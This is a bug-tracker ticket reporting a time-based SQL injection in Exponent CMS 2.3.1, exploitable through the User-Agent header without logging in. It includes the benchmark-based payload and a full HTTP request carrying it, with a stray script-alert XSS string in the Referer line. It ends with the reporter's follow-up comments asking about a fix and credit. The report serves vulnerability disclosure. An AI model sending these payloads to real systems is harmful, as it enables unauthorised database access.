Time Based SQL Injection " User Agent"
Reported by Narendra Bhati | November 16th, 2014 @ 11:53 AM | in User issues
Exponent CMS 2.3.1 - Time Based SQL Injection
Exploitation - Remotely ( Non Authenticated User Can Exploit It )
Vulnerable Parameter - User Agent Header
Payload - ' and benchmark(20000000,sha1(1))--
Here is http request which is taking 2 seconds to response compare then original response
GET /exponent/users/edituser/id/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0)
Gecko/20100101
Firefox/32.0'%20and%20benchmark(20000000%2csha1(1))--%20
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://127.0.0.1/exponent/index.php?src=%22%3E%3Cscript%3Ealert(1)%...
Cookie:
pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C75fabcf00a72c6c06c40ec432c44c158a90fe85b;
xoadmstyle=orange; PHPSESSID=1snnfufn6jlq63rbf1l7q9ps76;
xoops_user54677c84=0
Connection: keep-alive
Comments and changes to this ticket
-
Narendra Bhati November 16th, 2014 @ 12:01 PM
- Tag set to “security”
-
-
-
-
Narendra Bhati December 20th, 2014 @ 02:03 PM
- Assigned user set to “expNinja”
So what your are going to do next ? about this issue !
-
Narendra Bhati December 27th, 2014 @ 05:30 PM
- Assigned user set to “expNinja”
Is there any public acknowledgement will be annouce for reporting these issue ?
-
Narendra Bhati December 27th, 2014 @ 06:18 PM
- Assigned user set to “expNinja”
Thats look fine ! but sorry to say , where is my name for reporting issue ? isn`t is look strange !
-
Please Sign in or create a free account to add a new ticket.
With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.
Create new ticket
Create your profile
Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป
Bug Tracker for Exponent CMS
expNinja
Narendra Bhati